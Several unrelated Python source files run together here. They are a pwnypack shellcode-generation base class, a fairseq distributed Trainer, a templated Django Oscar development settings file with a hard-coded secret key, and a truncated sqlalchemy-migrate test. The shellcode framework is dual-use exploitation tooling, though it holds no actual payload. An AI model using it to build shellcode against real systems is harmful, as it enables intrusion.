try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
from enum import IntEnum
import functools
from kwonly_args import first_kwonly_arg
import six
import pwnypack.asm
from pwnypack.shellcode.ops import SyscallInvoke, LoadRegister
from pwnypack.shellcode.translate import translate
from pwnypack.shellcode.types import Register, Offset, Buffer
__all__ = ['BaseEnvironment']
class BaseEnvironment(object):
"""
The abstract base for all shellcode environments.
"""
class TranslateOutput(IntEnum):
"""
        Output format of the translate function.
"""
code = 0 #: Emit binary, executable code.
assembly = 1 #: Emit assembly source.
meta = 2 #: Emit the declarative version of the translated function.
@property
def PREAMBLE(self):
raise NotImplementedError('Target does not define a preamble')
@property
def REGISTER_WIDTH_MAP(self):
raise NotImplementedError('Target does not define a register width map')
REGISTER_WIDTH = None #: Mapping of register -> width, filled by __init__ based on REGISTER_WIDTH_MAP
@property
def STACK_REG(self):
raise NotImplementedError('Target does not define a stack register')
@property
def OFFSET_REG(self):
raise NotImplementedError('Target does not define an offset register')
@property
def TEMP_REG(self):
raise NotImplementedError('Target does not define a temporary register mapping')
@property
def SYSCALL_RET_REG(self):
raise NotImplementedError('Target does not define a syscall return register')
def __init__(self):
if self.REGISTER_WIDTH is None:
self.REGISTER_WIDTH = dict([
(reg_, width)
for (width, regs) in self.REGISTER_WIDTH_MAP.items()
for reg_ in regs
])
self.data = OrderedDict()
self.buffers = []
@property
def target(self):
raise NotImplementedError('Target does not define a target architecture')
def _alloc_data(self, bytes):
offset, _ = self.data.get(bytes, (None, None))
if offset is not None:
return offset
offset = Offset(sum(len(b) for b in six.iterkeys(self.data))) if self.data else Offset(0)
self.data[bytes] = (offset, bytes)
return offset
def alloc_data(self, value):
"""
Allocate a piece of data that will be included in the shellcode body.
Arguments:
value(...): The value to add to the shellcode. Can be bytes or
string type.
Returns:
~pwnypack.types.Offset: The offset used to address the data.
"""
if isinstance(value, six.binary_type):
return self._alloc_data(value)
elif isinstance(value, six.text_type):
return self._alloc_data(value.encode('utf-8') + b'\0')
else:
raise TypeError('No idea how to encode %s' % repr(value))
def alloc_buffer(self, length):
"""
Allocate a buffer (a range of uninitialized memory).
Arguments:
length(int): The length of the buffer to allocate.
Returns:
~pwnypack.types.Buffer: The object used to address this buffer.
"""
buf = Buffer(sum(len(v) for v in six.iterkeys(self.data)) + sum(v.length for v in self.buffers), length)
self.buffers.append(buf)
return buf
def reg_push(self, reg):
raise NotImplementedError('Target does not define reg_push')
def reg_pop(self, reg):
raise NotImplementedError('Target does not define reg_pop')
def reg_add_imm(self, reg, imm):
raise NotImplementedError('Target does not define reg_add_imm')
def reg_sub_imm(self, reg, imm):
raise NotImplementedError('Target does not define reg_sub_imm')
def reg_add_reg(self, reg1, reg2):
raise NotImplementedError('Target does not define reg_add_reg')
def reg_sub_reg(self, reg1, reg2):
        raise NotImplementedError('Target does not define reg_sub_reg')
def reg_load_imm(self, reg, value):
raise NotImplementedError('Target does not define reg_load_imm')
def reg_load_reg(self, reg1, reg2):
raise NotImplementedError('Target does not define reg_load_reg')
def reg_load_offset(self, reg, offset):
raise NotImplementedError('Target does not define reg_load_offset')
def jump_reg(self, reg):
raise NotImplementedError('Target does not define a jump to register method')
def syscall(self, op):
raise NotImplementedError('Target does not define syscall method')
def data_finalizer(self, code, data):
raise NotImplementedError('Target does not define a data finalizer')
def reg_load_array(self, reg, value):
temp_reg = self.TEMP_REG[self.target.bits]
code = []
if value:
for item in reversed(value):
if isinstance(item, (six.text_type, six.binary_type)):
item = self.alloc_data(item)
if isinstance(item, Offset) and not item:
item = self.OFFSET_REG
if not isinstance(item, Register):
code.extend(self.reg_load(temp_reg, item))
item = temp_reg
code.extend(self.reg_push(item))
code.extend(self.reg_load(reg, self.STACK_REG))
return code
def reg_load(self, reg, value):
"""
Load a value into a register. The value can be a string or binary (in
which case the value is passed to :meth:`alloc_data`), another
:class:`Register`, an :class:`Offset` or :class:`Buffer`, an integer
immediate, a ``list`` or ``tuple`` or a syscall invocation.
Arguments:
reg(pwnypack.shellcode.types.Register): The register to load the
value into.
value: The value to load into the register.
Returns:
list: A list of mnemonics that will load value into reg.
"""
if isinstance(value, (six.text_type, six.binary_type)):
value = self.alloc_data(value)
if value is None:
return self.reg_load_imm(reg, 0)
elif isinstance(value, Register):
if reg is not value:
return self.reg_load_reg(reg, value)
else:
return []
elif isinstance(value, Offset):
if value:
return self.reg_load_offset(reg, value)
else:
return self.reg_load(reg, self.OFFSET_REG)
elif isinstance(value, Buffer):
return self.reg_load_offset(reg, sum(len(v) for v in six.iterkeys(self.data)) + value.offset)
elif isinstance(value, six.integer_types):
reg_width = self.REGISTER_WIDTH[reg]
if value < -2 ** (reg_width-1):
raise ValueError('%d does not fit %s' % (value, reg))
elif value >= 2 ** reg_width:
raise ValueError('%d does not fit %s' % (value, reg))
return self.reg_load_imm(reg, value)
elif isinstance(value, (list, tuple)):
return self.reg_load_array(reg, value)
elif isinstance(value, SyscallInvoke):
return self.syscall(value) + self.reg_load(reg, self.SYSCALL_RET_REG)
else:
raise TypeError('Invalid argument type "%s"' % repr(value))
def reg_add(self, reg, value):
"""
Add a value to a register. The value can be another :class:`Register`,
an :class:`Offset`, a :class:`Buffer`, an integer or ``None``.
Arguments:
reg(pwnypack.shellcode.types.Register): The register to add the
value to.
value: The value to add to the register.
Returns:
list: A list of mnemonics that will add ``value`` to ``reg``.
"""
if value is None:
return []
elif isinstance(value, Register):
return self.reg_add_reg(reg, value)
elif isinstance(value, (Buffer, six.integer_types)):
if isinstance(reg, Buffer):
value = sum(len(v) for v in six.iterkeys(self.data)) + value.offset
if not value:
return []
reg_width = self.REGISTER_WIDTH[reg]
if value < -2 ** (reg_width-1):
raise ValueError('%d does not fit %s' % (value, reg))
elif value >= 2 ** reg_width:
raise ValueError('%d does not fit %s' % (value, reg))
if value > 0:
return self.reg_add_imm(reg, value)
else:
return self.reg_sub_imm(reg, -value)
else:
raise ValueError('Invalid argument type "%s"' % repr(value))
def reg_sub(self, reg, value):
if value is None:
return []
elif isinstance(value, Register):
return self.reg_sub_reg(reg, value)
elif isinstance(value, Buffer):
value = sum(len(v) for v in six.iterkeys(self.data)) + value.offset
return self.reg_add(reg, -value)
elif isinstance(value, six.integer_types):
return self.reg_add(reg, -value)
else:
raise ValueError('Invalid argument type "%s"' % repr(value))
def finalize(self, code):
return self.PREAMBLE + code
def compile(self, ops):
"""
Translate a list of operations into its assembler source.
Arguments:
ops(list): A list of shellcode operations.
Returns:
str: The assembler source code that implements the shellcode.
"""
def _compile():
code = []
for op in ops:
if isinstance(op, SyscallInvoke):
code.extend(self.syscall(op))
elif isinstance(op, LoadRegister):
code.extend(self.reg_load(op.register, op.value))
elif isinstance(op, str):
code.extend(op.split('\n'))
else:
raise ValueError('No idea how to assemble "%s"' % repr(op))
return ['\t%s' % line for line in code]
# We do 2 passes to make sure all data is allocated so buffers point at the right offset.
_compile()
return '\n'.join(self.finalize(self.data_finalizer(_compile(), self.data))) + '\n'
def assemble(self, ops):
"""
Assemble a list of operations into executable code.
Arguments:
ops(list): A list of shellcode operations.
Returns:
bytes: The executable code that implements the shellcode.
"""
return pwnypack.asm.asm(self.compile(ops), target=self.target)
@classmethod
@first_kwonly_arg('output')
def translate(cls, f=None, output=0, **kwargs):
"""translate(f=None, *, output=TranslateOutput.code, **kwargs)
Decorator that turns a function into a shellcode emitting function.
Arguments:
f(callable): The function to decorate. If ``f`` is ``None`` a
decorator will be returned instead.
output(~pwnypack.shellcode.base.BaseEnvironment.TranslateOutput): The output
format the shellcode function will produce.
**kwargs: Keyword arguments are passed to shellcode environment
constructor.
Returns:
A decorator that will translate the given function into a
shellcode generator
Examples:
>>> from pwny import *
>>> @sc.LinuxX86Mutable.translate
... def shellcode():
... sys_exit(0)
>>> @sc.LinuxX86Mutable.translate(output=1)
... def shellcode():
... sys_exit(0)
"""
def decorator(f):
@functools.wraps(f)
def proxy(*p_args, **p_kwargs):
env = cls(**kwargs)
result = translate(env, f, *p_args, **p_kwargs)
if output == cls.TranslateOutput.code:
return env.assemble(result)
elif output == cls.TranslateOutput.assembly:
return env.target, env.compile(result)
else:
return env, result
return proxy
if f is None:
return decorator
else:
return decorator(f)
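# Illustrative sketch only (not part of pwnypack): register names, widths
# and mnemonics below are hypothetical. A real target (such as the X86
# environments shipped with pwnypack) must implement every hook above that
# raises NotImplementedError.
class ToyEnvironment(BaseEnvironment):
    PREAMBLE = []                                  # no boilerplate for this toy target
    REGISTER_WIDTH_MAP = {32: ('r0', 'r1', 'sp')}  # hypothetical registers
    STACK_REG = 'sp'
    OFFSET_REG = 'r1'
    TEMP_REG = {32: 'r0'}
    SYSCALL_RET_REG = 'r0'

    def reg_push(self, reg):
        return ['push %s' % reg]                   # each hook returns a list of mnemonics

    def reg_load_imm(self, reg, value):
        return ['mov %s, %d' % (reg, value)]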
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the LICENSE file in
# the root directory of this source tree. An additional grant of patent rights
# can be found in the PATENTS file in the same directory.
"""
Train a network across multiple GPUs.
"""
from collections import defaultdict, OrderedDict
import contextlib
from itertools import chain
import torch
import apex_C
from fairseq import distributed_utils, optim, utils
from fairseq.meters import AverageMeter, TimeMeter
from fairseq.optim import lr_scheduler
class Trainer(object):
"""Main class for data parallel training.
This class supports data parallel training, where multiple workers each
have a full model replica and gradients are accumulated synchronously via
torch.distributed.all_reduce.
"""
def __init__(self, args, task, model, criterion, allreduce_communicators=None):
if not torch.cuda.is_available():
raise NotImplementedError('Training on CPU is not supported')
self.args = args
# copy model and criterion to current device
self.task = task
self.model = model.cuda()
self.criterion = criterion.cuda()
# initialize meters
self.meters = OrderedDict()
self.meters['train_loss'] = AverageMeter()
self.meters['train_nll_loss'] = AverageMeter()
self.meters['valid_loss'] = AverageMeter()
self.meters['valid_nll_loss'] = AverageMeter()
self.meters['wps'] = TimeMeter() # words per second
self.meters['ups'] = TimeMeter() # updates per second
self.meters['wpb'] = AverageMeter() # words per batch
self.meters['bsz'] = AverageMeter() # sentences per batch
self.meters['gnorm'] = AverageMeter() # gradient norm
self.meters['clip'] = AverageMeter() # % of updates clipped
self.meters['oom'] = AverageMeter() # out of memory
self.meters['wall'] = TimeMeter() # wall time in seconds
self._buffered_stats = defaultdict(lambda: [])
self._flat_grads = None
self._num_updates = 0
self._optim_history = None
self._optimizer = None
self._last_step = False
if self.args.enable_parallel_backward_allred_opt and not self.args.distributed_world_size > 1:
raise RuntimeError('--enable-parallel-backward-allred-opt is only meant for distributed training')
if self.args.enable_parallel_backward_allred_opt and not self.args.fp16:
raise RuntimeError('--enable-parallel-backward-allred-opt only works with FP16 training')
# rework all_gather_list implementation to mitigate memcpy overheads
# [sample_sizes,nsentences,loss,nll_loss,ooms_fwd,ooms_bwd]
self._all_reduce_list = [0.0] * 6
@property
def optimizer(self):
if self._optimizer is None:
self._build_optimizer()
return self._optimizer
def _build_optimizer(self):
self._optimizer = optim.build_optimizer(self.args, self.model.parameters())
self.lr_scheduler = lr_scheduler.build_lr_scheduler(self.args, self._optimizer)
def save_checkpoint(self, filename, extra_state):
"""Save all training state in a checkpoint file."""
if distributed_utils.is_master(self.args): # only save one checkpoint
extra_state['train_meters'] = self.meters
utils.save_state(
filename, self.args, self.model, self.criterion, self.optimizer,
self.lr_scheduler, self._num_updates, self._optim_history, extra_state,
)
def load_checkpoint(self, filename, load_optim=True):
"""Load all training state from a checkpoint file."""
extra_state, optim_history, last_optim_state = \
utils.load_model_state(filename, self.model)
if last_optim_state is not None:
# rebuild optimizer after loading model, since params may have changed
self._build_optimizer()
if load_optim:
self._optim_history = optim_history
# only reload optimizer and lr_scheduler if they match
last_optim = self._optim_history[-1]
if last_optim['criterion_name'] == self.criterion.__class__.__name__:
self.lr_scheduler.load_state_dict(last_optim['lr_scheduler_state'])
if last_optim['optimizer_name'] == self.optimizer.__class__.__name__:
self.optimizer.load_state_dict(last_optim_state)
self._num_updates = last_optim['num_updates']
if extra_state is not None and 'train_meters' in extra_state:
self.meters = extra_state['train_meters']
del extra_state['train_meters']
return extra_state
def train_step(self, sample, update_params=True, last_step=False):
"""Do forward, backward and parameter update."""
# Set seed based on args.seed and the update number so that we get
# reproducible results when resuming from checkpoints
seed = self.args.seed + self.get_num_updates()
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
self._last_step = last_step
# forward and backward pass
sample = self._prepare_sample(sample)
loss, sample_size, logging_output, oom_fwd = self._forward(sample)
oom_bwd = self._backward(loss)
# buffer stats and logging outputs
self._buffered_stats['sample_sizes'].append(sample_size)
self._buffered_stats['logging_outputs'].append(logging_output)
self._buffered_stats['ooms_fwd'].append(oom_fwd)
self._buffered_stats['ooms_bwd'].append(oom_bwd)
# rework all_gather_list
assert(sample_size == logging_output.get('sample_size', 0.0))
assert(sample_size == logging_output.get('ntokens', 0.0))
self._all_reduce_list[0] += sample_size
self._all_reduce_list[1] += logging_output.get('nsentences', 0.0)
self._all_reduce_list[2] += logging_output.get('loss', 0.0)
self._all_reduce_list[3] += logging_output.get('nll_loss', 0.0)
self._all_reduce_list[4] += oom_fwd
self._all_reduce_list[5] += oom_bwd
# update parameters
if update_params:
check_against_old_code = False
# check_against_old_code = True
if check_against_old_code:
# gather logging outputs from all replicas
sample_sizes = self._buffered_stats['sample_sizes']
logging_outputs = self._buffered_stats['logging_outputs']
ooms_fwd = self._buffered_stats['ooms_fwd']
ooms_bwd = self._buffered_stats['ooms_bwd']
# print(sample_sizes,logging_outputs,ooms_fwd,ooms_bwd)
if self.args.distributed_world_size > 1:
sample_sizes, logging_outputs, ooms_fwd, ooms_bwd = map(
lambda l: list(chain.from_iterable(l)),
zip(*distributed_utils.all_gather_list(
(sample_sizes, logging_outputs, ooms_fwd, ooms_bwd)
))
)
# print("\n",sample_sizes, logging_outputs, ooms_fwd, ooms_bwd)
ooms_fwd = sum(ooms_fwd)
ooms_bwd = sum(ooms_bwd)
if ooms_fwd == self.args.distributed_world_size:
print('| WARNING: OOM in all workers, skipping batch')
self.zero_grad()
return None
# aggregate stats and logging outputs
ntokens = sum(log.get('ntokens', 0) for log in logging_outputs)
nsentences = sum(log.get('nsentences', 0) for log in logging_outputs)
agg_logging_output = self.criterion.__class__.aggregate_logging_outputs(logging_outputs)
grad_denom = self.criterion.__class__.grad_denom(sample_sizes)
assert( grad_denom == sum(sample_sizes) )
assert( grad_denom == ntokens )
assert( grad_denom == agg_logging_output['sample_size'] )
all_gather_list_tensor = torch.cuda.DoubleTensor([grad_denom, nsentences, agg_logging_output['loss'], agg_logging_output['nll_loss'], ooms_fwd, ooms_bwd])
print("\n",all_gather_list_tensor)
# rework all_gather_list
all_reduce_list_tensor = torch.cuda.DoubleTensor(self._all_reduce_list)
if self.args.distributed_world_size > 1:
torch.distributed.all_reduce(all_reduce_list_tensor)
all_reduce_list_tensor[2:4].div_((all_reduce_list_tensor[0:1]*torch.log(torch.cuda.DoubleTensor([2]))))
if check_against_old_code:
print(all_reduce_list_tensor)
assert(grad_denom == all_reduce_list_tensor[0].item())
assert(nsentences == all_reduce_list_tensor[1].item())
# compare loss values
# print(all_gather_list_tensor[2:4] - all_reduce_list_tensor[2:4])
assert(torch.all(torch.lt(torch.abs(torch.add(all_gather_list_tensor[2:4], -all_reduce_list_tensor[2:4])), 1e-12)))
assert(ooms_fwd == all_reduce_list_tensor[4].item())
assert(ooms_bwd == all_reduce_list_tensor[5].item())
agg_logging_output = {}
[grad_denom, nsentences, agg_logging_output['loss'], agg_logging_output['nll_loss'], ooms_fwd, ooms_bwd] = all_reduce_list_tensor.tolist()
agg_logging_output['sample_size'] = all_reduce_list_tensor[0].item()
ntokens = grad_denom
# print([grad_denom, ntokens, nsentences, agg_logging_output['loss'], agg_logging_output['nll_loss'], ooms_fwd, ooms_bwd])
if ooms_fwd == self.args.distributed_world_size:
print('| WARNING: OOM in all workers, skipping batch')
self.zero_grad()
return None
try:
# all-reduce and rescale gradients, then take an optimization step
# grad_norm = self._all_reduce_and_rescale(grad_denom, sample is not None)
grad_norm = self._all_reduce_and_rescale(all_reduce_list_tensor[0].item(), sample is not None)
self._opt()
# update meters
self.meters['wps'].update(ntokens)
self.meters['ups'].update(1.)
self.meters['wpb'].update(ntokens)
self.meters['bsz'].update(nsentences)
if grad_norm is not None:
self.meters['gnorm'].update(grad_norm)
self.meters['clip'].update(1. if grad_norm > self.args.clip_norm else 0.)
self.meters['oom'].update(ooms_fwd + ooms_bwd)
# update loss meters for training
if 'loss' in agg_logging_output:
self.meters['train_loss'].update(agg_logging_output['loss'], grad_denom)
# criterions can optionally log the NLL loss too
if 'nll_loss' in agg_logging_output:
self.meters['train_nll_loss'].update(agg_logging_output['nll_loss'], ntokens)
except OverflowError as e:
self.zero_grad()
print('| WARNING: overflow detected, ' + str(e))
self.clear_buffered_stats()
return agg_logging_output
else:
return None # buffering updates
def _forward(self, sample, eval=False):
loss = None
sample_size = 0
logging_output = {
'ntokens': sample['ntokens'] if sample is not None else 0,
'nsentences': sample['target'].size(0) if sample is not None else 0,
}
oom = 0
try:
# prepare model and optimizer
if eval:
self.model.eval()
else:
self.model.train()
if sample is not None:
with torch.no_grad() if eval else contextlib.ExitStack():
# calculate loss and sample size
loss, sample_size, logging_output_ = self.task.get_loss(self.model, self.criterion, sample)
logging_output.update(logging_output_)
except RuntimeError as e:
if not eval and 'out of memory' in str(e):
print('| WARNING: ran out of memory, skipping batch')
oom = 1
loss = None
else:
raise e
return loss, sample_size, logging_output, oom
def _backward(self, loss):
oom = 0
if loss is not None:
try:
# backward pass
loss.backward()
except RuntimeError as e:
if 'out of memory' in str(e):
print('| WARNING: ran out of memory, skipping batch')
oom = 1
self.zero_grad()
else:
raise e
return oom
    def _all_reduce_and_rescale(self, grad_denom, non_empty=True):
        # flatten grads into a single buffer and all-reduce
        flat_grads = self._flat_grads = self._get_flat_grads(out=self._flat_grads, has_grad=non_empty)
if self.args.distributed_world_size > 1:
torch.distributed.all_reduce(flat_grads)
# rescale and clip gradients
flat_grads.div_(grad_denom)
grad_norm = utils.clip_grad_norm_(flat_grads, self.args.clip_norm)
# copy grads back into model parameters
self._set_flat_grads(flat_grads)
return grad_norm
    def _get_grads(self, has_grad=True):
grads = []
for name, p in self.model.named_parameters():
if not p.requires_grad:
continue
if p.grad is None:
if has_grad:
raise RuntimeError('Model parameter did not receive gradient: ' + name + '. '
'Use the param in the forward pass or set requires_grad=False')
else:
p.grad = torch.zeros_like(p)
grads.append(p.grad.data)
return grads
    def _get_flat_grads(self, out=None, has_grad=True):
grads = self._get_grads(has_grad)
#if out is None:
# grads_size = sum(g.numel() for g in grads)
# out = grads[0].new(grads_size).zero_()
#offset = 0
#for g in grads:
# numel = g.numel()
# out[offset:offset+numel].copy_(g.view(-1))
# offset += numel
#return out[:offset]
return apex_C.flatten(grads)
def _set_flat_grads(self, new_grads):
grads = self._get_grads()
offset = 0
for g in grads:
numel = g.numel()
g.copy_(new_grads[offset:offset+numel].view_as(g))
offset += numel
def _opt(self):
# take an optimization step
self.optimizer.step()
self.zero_grad()
self._num_updates += 1
# update learning rate
self.lr_scheduler.step_update(self._num_updates)
def valid_step(self, sample):
"""Do forward pass in evaluation mode."""
# forward pass
sample = self._prepare_sample(sample)
_loss, sample_size, logging_output, oom_fwd = self._forward(sample, eval=True)
assert not oom_fwd, 'Ran out of memory during validation'
# gather logging outputs from all GPUs
if self.args.distributed_world_size > 1:
sample_sizes, logging_outputs = zip(*distributed_utils.all_gather_list(
(sample_size, logging_output)
))
else:
sample_sizes = [sample_size]
logging_outputs = [logging_output]
# aggregate stats and logging outputs
ntokens = sum(log.get('ntokens', 0) for log in logging_outputs)
grad_denom = self.criterion.__class__.grad_denom(sample_sizes)
agg_logging_output = self.criterion.__class__.aggregate_logging_outputs(logging_outputs)
# update loss meters for validation
if 'loss' in agg_logging_output:
self.meters['valid_loss'].update(agg_logging_output['loss'], grad_denom)
# criterions can optionally log the NLL loss too
if 'nll_loss' in agg_logging_output:
self.meters['valid_nll_loss'].update(agg_logging_output['nll_loss'], ntokens)
return agg_logging_output
def dummy_train_step(self, dummy_batch):
"""Dummy training step for warming caching allocator."""
self.train_step(dummy_batch, update_params=False)
self.zero_grad()
self.clear_buffered_stats()
def zero_grad(self):
self.optimizer.zero_grad()
def clear_buffered_stats(self):
self._buffered_stats.clear()
self._all_reduce_list = [0.0] * 6
def lr_step(self, epoch, val_loss=None):
"""Adjust the learning rate based on the validation loss."""
return self.lr_scheduler.step(epoch, val_loss)
def lr_step_update(self, num_updates):
"""Update the learning rate after each update."""
return self.lr_scheduler.step_update(num_updates)
def get_lr(self):
"""Get the current learning rate."""
return self.optimizer.get_lr()
def get_model(self):
"""Get the model replica."""
return self.model
def get_meter(self, name):
"""Get a specific meter by name."""
if name not in self.meters:
return None
return self.meters[name]
def get_num_updates(self):
"""Get the number of parameters updates."""
return self._num_updates
def _prepare_sample(self, sample):
if sample is None or len(sample) == 0:
return None
return utils.move_to_cuda(sample)
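# A minimal usage sketch (assumed, not part of this file): how a caller
# might drive the Trainer. `args`, `task`, `model`, `criterion`, the batch
# iterator and `args.update_freq` are placeholders built elsewhere in fairseq.
#
#   trainer = Trainer(args, task, model, criterion)
#   trainer.dummy_train_step(dummy_batch)      # warm the caching allocator
#   for epoch in itertools.count(1):
#       for i, sample in enumerate(epoch_itr):
#           # buffer several steps, only updating params on the last one
#           update = (i + 1) % args.update_freq == 0
#           trainer.train_step(sample, update_params=update)
#       val_loss = ...  # aggregate trainer.valid_step(sample) over val data
#       trainer.lr_step(epoch, val_loss)       # anneal the learning rate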
import os
# Django settings for oscar project.
PROJECT_DIR = os.path.dirname(__file__)
location = lambda x: os.path.join(os.path.dirname(os.path.realpath(__file__)), x)
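# e.g. location('db.sqlite') returns an absolute path alongside this settings
# module, such as /path/to/project/db.sqlite (illustrative path).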
DEBUG = True
TEMPLATE_DEBUG = True
SQL_DEBUG = True
ADMINS = (
# ('Your Name', 'your_email@domain.com'),
)
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
USE_TZ = True
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
# Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': location('db.sqlite'), # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
ATOMIC_REQUESTS = True
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'Europe/London'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-gb'
gettext_noop = lambda s: s
LANGUAGES = (
('en-gb', gettext_noop('British English')),
('zh-cn', gettext_noop('Simplified Chinese')),
('zh-tw', gettext_noop('Taiwan Chinese')),
('nl', gettext_noop('Dutch')),
('it', gettext_noop('Italian')),
('pl', gettext_noop('Polish')),
('ru', gettext_noop('Russian')),
('sk', gettext_noop('Slovak')),
('pt-br', gettext_noop('Brazilian Portuguese')),
('fr', gettext_noop('French')),
('de', gettext_noop('German')),
('ko', gettext_noop('Korean')),
('uk', gettext_noop('Ukrainian')),
('es', gettext_noop('Spanish')),
('da', gettext_noop('Danish')),
('ar', gettext_noop('Arabic')),
('ca', gettext_noop('Catalan')),
('cs', gettext_noop('Czech')),
('el', gettext_noop('Greek')),
)
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute path to the directory that holds media.
# Example: "/home/media/media.lawrence.com/"
MEDIA_ROOT = location("public/media")
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash if there is a path component (optional in other cases).
# Examples: "http://media.lawrence.com", "http://example.com/media/"
MEDIA_URL = '/media/'
# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a
# trailing slash.
# Examples: "http://foo.com/media/", "/media/".
# ADMIN_MEDIA_PREFIX = '/media/admin/'
STATIC_URL = '/static/'
STATIC_ROOT = location('public')
# Make this unique, and don't share it with anybody.
SECRET_KEY = '$)a7n&o80u!6y5t-+jrd3)3!%vh&shg$wqpjpxc!ar&p#!)n1a'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# needed by django-treebeard for admin (and potentially other libs)
'django.template.loaders.eggs.Loader',
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.request",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.contrib.messages.context_processors.messages",
# Oscar specific
'oscar.apps.search.context_processors.search_form',
'oscar.apps.promotions.context_processors.promotions',
'oscar.apps.checkout.context_processors.checkout',
'oscar.core.context_processors.metadata',
)
MIDDLEWARE_CLASSES = (
'debug_toolbar.middleware.DebugToolbarMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',
# Allow languages to be selected
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
# Ensure a valid basket is added to the request instance for every request
'oscar.apps.basket.middleware.BasketMiddleware',
# Enable the ProfileMiddleware, then add ?cprofile to any
# URL path to print out profile details
#'oscar.profiling.middleware.ProfileMiddleware',
)
INTERNAL_IPS = ('127.0.0.1',)
ROOT_URLCONF = 'urls'
from oscar import OSCAR_MAIN_TEMPLATE_DIR
TEMPLATE_DIRS = (
location('templates'),
os.path.join(OSCAR_MAIN_TEMPLATE_DIR, 'templates'),
OSCAR_MAIN_TEMPLATE_DIR,
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'django.utils.log.NullHandler',
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler',
},
},
'loggers': {
'django': {
'handlers': ['null'],
'propagate': True,
'level': 'INFO',
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': False,
},
'oscar.checkout': {
'handlers': ['console'],
'propagate': True,
'level': 'INFO',
},
'django.db.backends': {
'handlers': ['null'],
'propagate': False,
'level': 'DEBUG',
},
'paypal.express': {
'handlers': ['console'],
'propagate': True,
'level': 'DEBUG',
},
'paypal.payflow': {
'handlers': ['console'],
'propagate': True,
'level': 'DEBUG',
},
}
}
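# Illustrative routing under the config above: records reach the handlers
# configured per logger, e.g.
#   logging.getLogger('oscar.checkout').info('...')       # -> console handler
#   logging.getLogger('django.db.backends').debug('...')  # -> null handler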
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.admin',
'django.contrib.flatpages',
'django.contrib.staticfiles',
# External apps
'django_extensions',
'debug_toolbar',
# Apps from oscar
'compressor',
'widget_tweaks',
'<%= packagename %>',
]
from oscar import get_core_apps
INSTALLED_APPS = INSTALLED_APPS + get_core_apps([])
AUTHENTICATION_BACKENDS = (
'oscar.apps.customer.auth_backends.Emailbackend',
'django.contrib.auth.backends.ModelBackend',
)
LOGIN_REDIRECT_URL = '/accounts/'
APPEND_SLASH = True
# Oscar settings
from oscar.defaults import *
OSCAR_ALLOW_ANON_CHECKOUT = True
# Add Payflow dashboard stuff to settings
from django.utils.translation import ugettext_lazy as _
# Haystack settings
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.simple_backend.SimpleEngine',
},
}
########## <%= capitalizePackagename %> CONFIGURATION
OSCAR_DASHBOARD_NAVIGATION.append(
{
'label': _('<%= capitalizePackagename %>'),
'icon': 'icon-info',
'children': [
{
'label': '<%= capitalizePackagename %>',
'url_name': '<%= packagename %>-list',
},
]
})
########## END HOOK CONFIGURATION
# -*- coding: utf-8 -*-
import os
from sqlalchemy import *
from nose.tools import eq_
from migrate.versioning import schemadiff
from migrate.changeset import SQLA_06
from migrate.tests import fixture
class SchemaDiffBase(fixture.DB):
level = fixture.DB.CONNECT
def _make_table(self,*cols,**kw):
self.table = Table('xtable', self.meta,
Column('id',Integer(), primary_key=True),
*cols
)
if kw.get('create',True):
self.table.create()
def _assert_diff(self,col_A,col_B):
self._make_table(col_A)
self.meta.clear()
self._make_table(col_B,create=False)
diff = self._run_diff()
# print diff
self.assertTrue(diff)
eq_(1,len(diff.tables_different))
td = diff.tables_different.values()[0]
eq_(1,len(td.columns_different))
cd = td.columns_different.values()[0]
eq_(('Schema diffs:\n'
' table with differences: xtable\n'
' column with differences: data\n'
' model: %r\n'
' database: %r')%(
cd.col_A,
cd.col_B
),str(diff))
class Test_getDiffOfModelAgainstDatabase(SchemaDiffBase):
